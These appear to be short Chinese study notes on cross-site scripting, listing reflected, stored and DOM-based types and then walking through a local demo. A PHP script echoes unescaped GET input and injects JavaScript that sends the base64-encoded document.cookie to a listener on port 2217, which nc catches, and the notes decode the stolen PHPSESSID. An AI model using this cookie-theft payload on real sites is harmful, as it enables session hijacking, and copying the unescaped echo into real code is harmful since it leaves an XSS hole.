XSS分类
与服务端的处理请求的方式有关
- 反射型(响应只能反射到发起请求的人那里)
- 存储型(漏洞影响其他访问该网站服务的用户)
与服务端的处理请求的方式无关
- DOM型(比如
location.href.hash
)
设置php服务端脚本
$ cat index.php [3:06:29]
<?php
session_start();
echo $_GET['x']. "\n";
echo '<script>location.href = "//127.0.0.1:2217/" + btoa(document.cookie)</script>"';
?>
#这里btoa()函数是js的base64加密的方法
用PHP开启默认web服务器
$ php -S 127.0.0.1:2215
用nc监听某端口作为一个TCP服务器接收HTTP请求
$ nc -k -l 2217 #-k表示持续监听
构造url访问2215的web服务
http://127.0.0.1:2215/?pwd=cqq
查看php的web访问日志
$ echo "UEhQU0VTU0lEPWRiYTVhZDg2OTFmZTkyNjZkZmMwYjlkYzIxMjg5ODU5"|base64 -D
PHPSESSID=dba5ad8691fe9266dfc0b9dc21289859%